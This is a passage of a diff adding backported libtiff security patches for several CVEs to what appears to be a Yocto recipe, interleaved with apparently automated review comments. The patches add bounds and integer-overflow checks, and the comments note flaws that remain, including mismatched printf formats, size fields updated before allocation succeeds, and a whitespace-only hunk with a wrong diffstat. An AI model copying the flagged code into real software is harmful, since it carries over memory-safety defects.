++ new_dirlist = (uint64 *)_TIFFCheckRealloc(tif, tif->tif_dirlistoff,
++ tif->tif_dirlistsize, sizeof(uint64), "for IFD offset list");
+ if (!new_dirlist)
+ return 0;
+- if( tif->tif_dirnumber >= 32768 )
+- tif->tif_dirlistsize = 65535;
+- else
+- tif->tif_dirlistsize = 2 * tif->tif_dirnumber;
+- tif->tif_dirlist = new_dirlist;
++ tif->tif_dirlistoff = new_dirlist;
++ new_dirlist = (uint64 *)_TIFFCheckRealloc(tif, tif->tif_dirlistdirn,
++ tif->tif_dirlistsize, sizeof(uint16), "for IFD dirnumber list");
++ if (!new_dirlist)
++ return 0;
++ tif->tif_dirlistdirn = (uint16 *)new_dirlist;
+ }
+
+- tif->tif_dirlist[tif->tif_dirnumber - 1] = diroff;
++ tif->tif_dirlistoff[tif->tif_dirnumber - 1] = diroff;
++ tif->tif_dirlistdirn[tif->tif_dirnumber - 1] = dirn;
+
+ return 1;
+-}
++} /* --- _TIFFCheckDirNumberAndOffset() ---*/
+
+ /*
+ * Check the count field of a directory entry against a known value. The
+@@ -4703,6 +4747,47 @@ CheckDirCount(TIFF* tif, TIFFDirEntry* d
+ }
+
+ /*
++ * Retrieve the matching IFD directory number of a given IFD offset
++ * from the list of directories already seen.
++ * Returns 1 if the offset was in the list and the directory number
++ * can be returned.
++ * Otherwise returns 0 or if an error occured.
++ */
++int
++_TIFFGetDirNumberFromOffset(TIFF *tif, uint64 diroff, uint16* dirn)
++{
++ uint16 n;
++
++ if (diroff == 0) /* no more directories */
++ return 0;
++ if (tif->tif_dirnumber == 65535) {
++ TIFFErrorExt(tif->tif_clientdata, "_TIFFGetDirNumberFromOffset",
++ "Cannot handle more than 65535 TIFF directories");
++ return 0;
++ }
++
++ /* Check if offset is already in the list and return matching directory number.
++ * Otherwise update IFD list using TIFFNumberOfDirectories()
++ * and search again in IFD list.
++ */
++ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistoff && tif->tif_dirlistdirn; n++) {
++ if (tif->tif_dirlistoff[n] == diroff) {
++ *dirn = tif->tif_dirlistdirn[n];
++ return 1;
++ }
++ }
++ TIFFNumberOfDirectories(tif);
++ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistoff && tif->tif_dirlistdirn; n++) {
++ if (tif->tif_dirlistoff[n] == diroff) {
++ *dirn = tif->tif_dirlistdirn[n];
++ return 1;
++ }
++ }
++ return 0;
++} /*--- _TIFFGetDirNumberFromOffset() ---*/
++
++
++/*
+ * Read IFD structure from the specified offset. If the pointer to
+ * nextdiroff variable has been specified, read it too. Function returns a
+ * number of fields in the directory or 0 if failed.
+--- tiff-4.1.0+git191117.orig/libtiff/tif_open.c
++++ tiff-4.1.0+git191117/libtiff/tif_open.c
+@@ -353,7 +353,8 @@ TIFFClientOpen(
+ if (!TIFFDefaultDirectory(tif))
+ goto bad;
+ tif->tif_diroff = 0;
+- tif->tif_dirlist = NULL;
++ tif->tif_dirlistoff = NULL;
++ tif->tif_dirlistdirn = NULL;
+ tif->tif_dirlistsize = 0;
+ tif->tif_dirnumber = 0;
+ return (tif);
+--- tiff-4.1.0+git191117.orig/libtiff/tiffiop.h
++++ tiff-4.1.0+git191117/libtiff/tiffiop.h
+@@ -145,7 +145,8 @@ struct tiff {
+ #define TIFF_CHOPPEDUPARRAYS 0x4000000U /* set when allocChoppedUpStripArrays() has modified strip array */
+ uint64 tif_diroff; /* file offset of current directory */
+ uint64 tif_nextdiroff; /* file offset of following directory */
+- uint64* tif_dirlist; /* list of offsets to already seen directories to prevent IFD looping */
++ uint64* tif_dirlistoff; /* list of offsets to already seen directories to prevent IFD looping */
++ uint16* tif_dirlistdirn; /* list of directory numbers to already seen directories to prevent IFD looping */
+ uint16 tif_dirlistsize; /* number of entries in offset list */
+ uint16 tif_dirnumber; /* number of already seen directories */
+ TIFFDirectory tif_dir; /* internal rep of current directory */
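Review bot: The new diagnostics print `uint64` offsets with `%lx`/`%lu`, which only matches where `long` is 64 bits wide; on a 32-bit target the variadic arguments are misread, which is undefined behaviour in an error path reached from file contents. This applies to both messages added in TIFFAdvanceDirectory(), the warning in TIFFReadDirectory() and the warning in _TIFFCheckDirNumberAndOffset(). The unchanged context line in TIFFReadDirectory() already uses `TIFF_UINT64_FORMAT`, so the same macro fits here, e.g. `"Starting directory %hu at offset " TIFF_UINT64_FORMAT " might cause an IFD loop", *nextdirnum, *nextdiroff`. Separately, _TIFFCheckDirNumberAndOffset() now raises `tif_dirlistsize` (having already incremented `tif_dirnumber`) before either `_TIFFCheckRealloc()` call has succeeded, so a failed allocation appears to leave the size fields larger than the arrays. Assigning `tif_dirlistsize` only after both reallocations succeed, and undoing the `tif_dirnumber++` on failure, would keep later scans in bounds; `_TIFFCheckRealloc()` is not shown here, so confirm its failure behaviour.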
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch
new file mode 100644
index 0000000000..5747202bd9
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch
@@ -0,0 +1,26 @@
+From 424c82b5b33256e7f03faace51dc8010f3ded9ff Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Sat, 21 Jan 2023 15:58:10 +0000
+Subject: [PATCH] tiffcrop: Correct simple copy paste error. Fix #488.
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz]
+CVE: CVE-2022-48281
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ tools/tiffcrop.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index a0789a3..8aed9cd 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -7564,7 +7564,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ else
+ {
+- prev_cropsize = seg_buffs[0].size;
++ prev_cropsize = seg_buffs[i].size;
+ if (prev_cropsize < cropsize)
+ {
+ next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
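Review bot: This patch header gives no upstream reference for the one-line index fix: `Upstream-Status` names only the Debian source tarball, and unlike the CVE-2022-3970 and CVE-2023-0795 patches in this commit there is no `Origin:` line pointing at the libtiff commit. Without it the backport cannot be compared against upstream when the recipe is next upgraded or audited. Add a line such as `Origin: <upstream libtiff commit URL>` (placeholder; take the URL from the Debian patch) above the `---` separator. The header also does not say what reading `seg_buffs[0].size` instead of `seg_buffs[i].size` caused; one sentence stating that the `prev_cropsize < cropsize` grow check compared against the wrong segment's size would help readers. processCropSelections() continues outside the hunk.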
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch
new file mode 100644
index 0000000000..253018525a
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch
@@ -0,0 +1,157 @@
+From 7808740e100ba30ffb791044f3b14dec3e85ed6f Mon Sep 17 00:00:00 2001
+From: Markus Koschany <apo@debian.org>
+Date: Tue, 21 Feb 2023 14:26:43 +0100
+Subject: [PATCH] CVE-2023-0795
+
+This is also the fix for CVE-2023-0796, CVE-2023-0797, CVE-2023-0798,
+CVE-2023-0799.
+
+Bug-Debian: https://bugs.debian.org/1031632
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/afaabc3e50d4e5d80a94143f7e3c997e7e410f68
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2023-0795 CVE-2023-0796 CVE-2023-0797 CVE-2023-0798 CVE-2023-0799
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ tools/tiffcrop.c | 51 ++++++++++++++++++++++++++++--------------------
+ 1 file changed, 30 insertions(+), 21 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index 8aed9cd..f21a7d7 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -277,7 +277,6 @@ struct region {
+ uint32 width; /* width in pixels */
+ uint32 length; /* length in pixels */
+ uint32 buffsize; /* size of buffer needed to hold the cropped region */
+- unsigned char *buffptr; /* address of start of the region */
+ };
+
+ /* Cropping parameters from command line and image data
+@@ -532,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
+ static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
+ uint32, uint32, uint8 *, uint8 *);
+ static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
+- unsigned char **);
++ unsigned char **, int);
+ static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
+ unsigned char *);
+ static int invertImage(uint16, uint16, uint16, uint32, uint32,
+@@ -5112,7 +5111,6 @@ initCropMasks (struct crop_mask *cps)
+ cps->regionlist[i].width = 0;
+ cps->regionlist[i].length = 0;
+ cps->regionlist[i].buffsize = 0;
+- cps->regionlist[i].buffptr = NULL;
+ cps->zonelist[i].position = 0;
+ cps->zonelist[i].total = 0;
+ }
+@@ -6358,8 +6356,13 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
+ image->adjustments & ROTATE_ANY);
+ return (-1);
+ }
+-
+- if (rotateImage(rotation, image, &image->width, &image->length, work_buff_ptr))
++
++ /* Dummy variable in order not to switch two times the
++ * image->width,->length within rotateImage(),
++ * but switch xres, yres there. */
++ uint32_t width = image->width;
++ uint32_t length = image->length;
++ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, TRUE))
+ {
+ TIFFError ("correct_orientation", "Unable to rotate image");
+ return (-1);
+@@ -6427,7 +6430,6 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
+ /* These should not be needed for composite images */
+ crop->regionlist[i].width = crop_width;
+ crop->regionlist[i].length = crop_length;
+- crop->regionlist[i].buffptr = crop_buff;
+
+ src_rowsize = ((img_width * bps * spp) + 7) / 8;
+ dst_rowsize = (((crop_width * bps * count) + 7) / 8);
+@@ -6664,7 +6666,6 @@ extractSeparateRegion(struct image_data *image, struct crop_mask *crop,
+
+ crop->regionlist[region].width = crop_width;
+ crop->regionlist[region].length = crop_length;
+- crop->regionlist[region].buffptr = crop_buff;
+
+ src = read_buff;
+ dst = crop_buff;
+@@ -7542,7 +7543,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, &crop_buff))
++ &crop->combined_length, &crop_buff, FALSE))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate composite regions by %d degrees", crop->rotation);
+@@ -7648,7 +7649,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->regionlist[i].width,
+- &crop->regionlist[i].length, &crop_buff))
++ &crop->regionlist[i].length, &crop_buff, FALSE))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate crop region by %d degrees", crop->rotation);
+@@ -7780,7 +7781,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, crop_buff_ptr))
++ &crop->combined_length, crop_buff_ptr, TRUE))
+ {
+ TIFFError("createCroppedImage",
+ "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
+@@ -8443,7 +8444,7 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
+ /* Rotate an image by a multiple of 90 degrees clockwise */
+ static int
+ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+- uint32 *img_length, unsigned char **ibuff_ptr)
++ uint32 *img_length, unsigned char **ibuff_ptr, int rot_image_params)
+ {
+ int shift_width;
+ uint32 bytes_per_pixel, bytes_per_sample;
+@@ -8634,11 +8635,15 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+
+ *img_width = length;
+ *img_length = width;
+- image->width = length;
+- image->length = width;
+- res_temp = image->xres;
+- image->xres = image->yres;
+- image->yres = res_temp;
++ /* Only toggle image parameters if whole input image is rotated. */
++ if (rot_image_params)
++ {
++ image->width = length;
++ image->length = width;
++ res_temp = image->xres;
++ image->xres = image->yres;
++ image->yres = res_temp;
++ }
+ break;
+
+ case 270: if ((bps % 8) == 0) /* byte aligned data */
+@@ -8711,11 +8716,15 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+
+ *img_width = length;
+ *img_length = width;
+- image->width = length;
+- image->length = width;
+- res_temp = image->xres;
+- image->xres = image->yres;
+- image->yres = res_temp;
++ /* Only toggle image parameters if whole input image is rotated. */
++ if (rot_image_params)
++ {
++ image->width = length;
++ image->length = width;
++ res_temp = image->xres;
++ image->xres = image->yres;
++ image->yres = res_temp;
++ }
+ break;
+ default:
+ break;
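Review bot: The two locals added in correct_orientation() are declared as `uint32_t`, while the rest of this tiffcrop.c uses libtiff's own `uint32` (the `rotateImage()` prototype changed in this same patch takes `uint32 *`), and they are declared after executable statements. If `uint32` and `uint32_t` are not the same underlying type on a target, `&width` and `&length` are passed as incompatible pointers, and whether `<stdint.h>` is in scope is not visible from the hunk. Declaring them as `uint32 width = image->width;` and `uint32 length = image->length;` keeps the backport consistent with the surrounding 4.1.0 code. correct_orientation() and rotateImage() both extend beyond the hunks shown.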
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch
new file mode 100644
index 0000000000..bf1a439b4d
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch
@@ -0,0 +1,135 @@
+From e18be834497e0ebf68d443abb9e18187f36cd3bf Mon Sep 17 00:00:00 2001
+From: Markus Koschany <apo@debian.org>
+Date: Tue, 21 Feb 2023 14:39:52 +0100
+Subject: [PATCH] CVE-2023-0800
+
+This is also the fix for CVE-2023-0801, CVE-2023-0802, CVE-2023-0803,
+CVE-2023-0804.
+
+Bug-Debian: https://bugs.debian.org/1031632
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/33aee1275d9d1384791d2206776eb8152d397f00
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2023-0800 CVE-2023-0801 CVE-2023-0802 CVE-2023-0803 CVE-2023-0804
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ tools/tiffcrop.c | 73 +++++++++++++++++++++++++++++++++++++++++++++---
+ 1 file changed, 69 insertions(+), 4 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f21a7d7..742615a 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -5250,18 +5250,40 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+
+ crop->regionlist[i].buffsize = buffsize;
+ crop->bufftotal += buffsize;
++
++ /* For composite images with more than one region, the
++ * combined_length or combined_width always needs to be equal,
++ * respectively.
++ * Otherwise, even the first section/region copy
++ * action might cause buffer overrun. */
+ if (crop->img_mode == COMPOSITE_IMAGES)
+ {
+ switch (crop->edge_ref)
+ {
+ case EDGE_LEFT:
+ case EDGE_RIGHT:
++ if (i > 0 && zlength != crop->combined_length)
++ {
++ TIFFError(
++ "computeInputPixelOffsets",
++ "Only equal length regions can be combined for "
++ "-E left or right");
++ return (-1);
++ }
+ crop->combined_length = zlength;
+ crop->combined_width += zwidth;
+ break;
+ case EDGE_BOTTOM:
+ case EDGE_TOP: /* width from left, length from top */
+ default:
++ if (i > 0 && zwidth != crop->combined_width)
++ {
++ TIFFError("computeInputPixelOffsets",
++ "Only equal width regions can be "
++ "combined for -E "
++ "top or bottom");
++ return (-1);
++ }
+ crop->combined_width = zwidth;
+ crop->combined_length += zlength;
+ break;
+@@ -6416,6 +6438,47 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
+ crop->combined_width = 0;
+ crop->combined_length = 0;
+
++ /* If there is more than one region, check beforehand whether all the width
++ * and length values of the regions are the same, respectively. */
++ switch (crop->edge_ref)
++ {
++ default:
++ case EDGE_TOP:
++ case EDGE_BOTTOM:
++ for (i = 1; i < crop->selections; i++)
++ {
++ uint32_t crop_width0 =
++ crop->regionlist[i - 1].x2 - crop->regionlist[i - 1].x1 + 1;
++ uint32_t crop_width1 =
++ crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
++ if (crop_width0 != crop_width1)
++ {
++ TIFFError("extractCompositeRegions",
++ "Only equal width regions can be combined for -E "
++ "top or bottom");
++ return (1);
++ }
++ }
++ break;
++ case EDGE_LEFT:
++ case EDGE_RIGHT:
++ for (i = 1; i < crop->selections; i++)
++ {
++ uint32_t crop_length0 =
++ crop->regionlist[i - 1].y2 - crop->regionlist[i - 1].y1 + 1;
++ uint32_t crop_length1 =
++ crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
++ if (crop_length0 != crop_length1)
++ {
++ TIFFError("extractCompositeRegions",
++ "Only equal length regions can be combined for "
++ "-E left or right");
++ return (1);
++ }
++ }
++ }
++
++
+ for (i = 0; i < crop->selections; i++)
+ {
+ /* rows, columns, width, length are expressed in pixels */
+@@ -6439,8 +6502,9 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
+ default:
+ case EDGE_TOP:
+ case EDGE_BOTTOM:
+- if ((i > 0) && (crop_width != crop->regionlist[i - 1].width))
+- {
++ if ((crop->selections > i + 1) &&
++ (crop_width != crop->regionlist[i + 1].width))
++ {
+ TIFFError ("extractCompositeRegions",
+ "Only equal width regions can be combined for -E top or bottom");
+ return (1);
+@@ -6520,8 +6584,9 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
+ break;
+ case EDGE_LEFT: /* splice the pieces of each row together, side by side */
+ case EDGE_RIGHT:
+- if ((i > 0) && (crop_length != crop->regionlist[i - 1].length))
+- {
++ if ((crop->selections > i + 1) &&
++ (crop_length != crop->regionlist[i + 1].length))
++ {
+ TIFFError ("extractCompositeRegions",
+ "Only equal length regions can be combined for -E left or right");
+ return (1);
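Review bot: The rewritten guards inside the per-region loop of extractCompositeRegions compare against `crop->regionlist[i + 1].width` and `.length`, fields of a region the loop has not reached yet, so they only mean something if those fields are filled in before this function runs, which these hunks do not show. The new pre-check above the loop derives the same sizes from `x2 - x1 + 1` instead, so the function now has two sources for one invariant. I would add a comment at the in-loop guard such as `/* regionlist[i + 1].width must already be populated here; the pre-check above is the authoritative equality test */`, or drop the in-loop guards if the pre-check is meant to cover them. The pre-check's `x2 - x1 + 1` is unsigned and wraps if x2 is below x1; whether that is excluded earlier is outside the hunk. extractCompositeRegions starts and ends outside these hunks.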
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch
new file mode 100644
index 0000000000..9915b77645
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch
@@ -0,0 +1,91 @@
+From 848434a81c443f59ec90d41218eba6e48a450a11 Mon Sep 17 00:00:00 2001
+From: zhailiangliang <zhailiangliang@loongson.cn>
+Date: Thu, 16 Mar 2023 16:16:54 +0800
+Subject: [PATCH] Fix heap-buffer-overflow in function extractImageSection
+
+CVE: CVE-2023-1916
+Upstream-Status: Submitted [https://gitlab.com/libtiff/libtiff/-/commit/848434a81c443f59ec90d41218eba6e48a450a11 https://gitlab.com/libtiff/libtiff/-/merge_requests/535]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ archive/tools/tiffcrop.c | 62 +++++++++++++++++++++++++++++-----------
+ 1 file changed, 45 insertions(+), 17 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/tools/tiffcrop.c
++++ tiff-4.1.0+git191117/tools/tiffcrop.c
+@@ -5549,6 +5549,15 @@ getCropOffsets(struct image_data *image,
+ crop->combined_width += (uint32)zwidth;
+ else
+ crop->combined_width = (uint32)zwidth;
++
++ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++ if (((crop->rotation == 90) || (crop->rotation == 270))
++ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++ {
++ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++ return -1;
++ }
++
+ break;
+ case EDGE_BOTTOM: /* width from left, zones from bottom to top */
+ zwidth = offsets.crop_width;
+@@ -5579,6 +5588,15 @@ getCropOffsets(struct image_data *image,
+ else
+ crop->combined_length = (uint32)zlength;
+ crop->combined_width = (uint32)zwidth;
++
++ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++ if (((crop->rotation == 90) || (crop->rotation == 270))
++ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++ {
++ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++ return -1;
++ }
++
+ break;
+ case EDGE_RIGHT: /* zones from right to left, length from top */
+ zlength = offsets.crop_length;
+@@ -5606,6 +5624,15 @@ getCropOffsets(struct image_data *image,
+ crop->combined_width += (uint32)zwidth;
+ else
+ crop->combined_width = (uint32)zwidth;
++
++ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++ if (((crop->rotation == 90) || (crop->rotation == 270))
++ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++ {
++ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++ return -1;
++ }
++
+ break;
+ case EDGE_TOP: /* width from left, zones from top to bottom */
+ default:
+@@ -5632,6 +5659,15 @@ getCropOffsets(struct image_data *image,
+ else
+ crop->combined_length = (uint32)zlength;
+ crop->combined_width = (uint32)zwidth;
++
++ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++ if (((crop->rotation == 90) || (crop->rotation == 270))
++ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++ {
++ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++ return -1;
++ }
++
+ break;
+ } /* end switch statement */
+
+@@ -6827,9 +6863,9 @@ extractImageSection(struct image_data *i
+ * regardless of the way the data are organized in the input file.
+ * Furthermore, bytes and bits are arranged in buffer according to COMPRESSION=1 and FILLORDER=1
+ */
+- img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
+- full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
+- trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
++ img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
++ full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
++ trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
+
+ #ifdef DEVELMODE
+ TIFFError ("", "First row: %d, last row: %d, First col: %d, last col: %d\n",
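Review bot: The last hunk, in extractImageSection, replaces the `img_rowsize`, `full_bytes` and `trailing_bits` lines with lines that appear to differ only in whitespace, so the function named in the subject is not functionally changed by this backport. The header's diffstat (`archive/tools/tiffcrop.c`, 45 insertions, 17 deletions) does not match the body either, which adds the same nine-line bounds check four times in getCropOffsets of `tools/tiffcrop.c`. Please confirm against the referenced upstream commit and merge request that nothing needed for CVE-2023-1916 was dropped, and record the trimming in the patch header if it is deliberate. The added check runs only for rotations of 90 and 270 degrees; whether other rotations are bounded elsewhere is outside these hunks.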
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch
new file mode 100644
index 0000000000..7d6d40f25a
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch
@@ -0,0 +1,173 @@
+From 9c22495e5eeeae9e00a1596720c969656bb8d678 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 3 Feb 2023 15:31:31 +0100
+Subject: [PATCH] tiffcrop correctly update buffersize after rotateImage()
+ fix#520 rotateImage() set up a new buffer and calculates its size
+ individually. Therefore, seg_buffs[] size needs to be updated accordingly.
+ Before this fix, the seg_buffs buffer size was calculated with a different
+ formula than within rotateImage().
+
+Closes #520.
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/9c22495e5eeeae9e00a1596720c969656bb8d678 && https://gitlab.com/libtiff/libtiff/-/commit/688012dca2c39033aa2dc7bcea9796787cfd1b44]
+CVE: CVE-2023-25433
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 69 +++++++++++++++++++++++++++++++++++++++---------
+ 1 file changed, 56 insertions(+), 13 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index 742615a..aab0ec6 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -531,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
+ static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
+ uint32, uint32, uint8 *, uint8 *);
+ static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
+- unsigned char **, int);
++ unsigned char **, size_t *);
+ static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
+ unsigned char *);
+ static int invertImage(uint16, uint16, uint16, uint32, uint32,
+@@ -6384,7 +6384,7 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
+ * but switch xres, yres there. */
+ uint32_t width = image->width;
+ uint32_t length = image->length;
+- if (rotateImage(rotation, image, &width, &length, work_buff_ptr, TRUE))
++ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL))
+ {
+ TIFFError ("correct_orientation", "Unable to rotate image");
+ return (-1);
+@@ -7607,8 +7607,12 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
++ /* rotateImage() set up a new buffer and calculates its size
++ * individually. Therefore, seg_buffs size needs to be updated
++ * accordingly. */
++ size_t rot_buf_size = 0;
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, &crop_buff, FALSE))
++ &crop->combined_length, &crop_buff, &rot_buf_size))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate composite regions by %d degrees", crop->rotation);
+@@ -7713,8 +7717,13 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+- if (rotateImage(crop->rotation, image, &crop->regionlist[i].width,
+- &crop->regionlist[i].length, &crop_buff, FALSE))
++ /* Furthermore, rotateImage() set up a new buffer and calculates
++ * its size individually. Therefore, seg_buffs size needs to be
++ * updated accordingly. */
++ size_t rot_buf_size = 0;
++ if (rotateImage(
++ crop->rotation, image, &crop->regionlist[i].width,
++ &crop->regionlist[i].length, &crop_buff, &rot_buf_size))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate crop region by %d degrees", crop->rotation);
+@@ -7725,8 +7734,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ crop->combined_width = total_width;
+ crop->combined_length = total_length;
+ seg_buffs[i].buffer = crop_buff;
+- seg_buffs[i].size = (((crop->regionlist[i].width * image->bps + 7 ) / 8)
+- * image->spp) * crop->regionlist[i].length;
++ seg_buffs[i].size = rot_buf_size;
+ }
+ }
+ }
+@@ -7735,7 +7743,6 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+
+ /* Copy the crop section of the data from the current image into a buffer
+ * and adjust the IFD values to reflect the new size. If no cropping is
+- * required, use the origial read buffer as the crop buffer.
+ *
+ * There is quite a bit of redundancy between this routine and the more
+ * specialized processCropSelections, but this provides
+@@ -7846,7 +7853,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, crop_buff_ptr, TRUE))
++ &crop->combined_length, crop_buff_ptr, NULL))
+ {
+ TIFFError("createCroppedImage",
+ "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
+@@ -8515,7 +8522,8 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+ uint32 bytes_per_pixel, bytes_per_sample;
+ uint32 row, rowsize, src_offset, dst_offset;
+ uint32 i, col, width, length;
+- uint32 colsize, buffsize, col_offset, pix_offset;
++ uint32 colsize, col_offset, pix_offset;
++ tmsize_t buffsize;
+ unsigned char *ibuff;
+ unsigned char *src;
+ unsigned char *dst;
+@@ -8528,12 +8536,41 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+ spp = image->spp;
+ bps = image->bps;
+
++ if ((spp != 0 && bps != 0 &&
++ width > (uint32_t)((UINT32_MAX - 7) / spp / bps)) ||
++ (spp != 0 && bps != 0 &&
++ length > (uint32_t)((UINT32_MAX - 7) / spp / bps)))
++ {
++ TIFFError("rotateImage", "Integer overflow detected.");
++ return (-1);
++ }
++
+ rowsize = ((bps * spp * width) + 7) / 8;
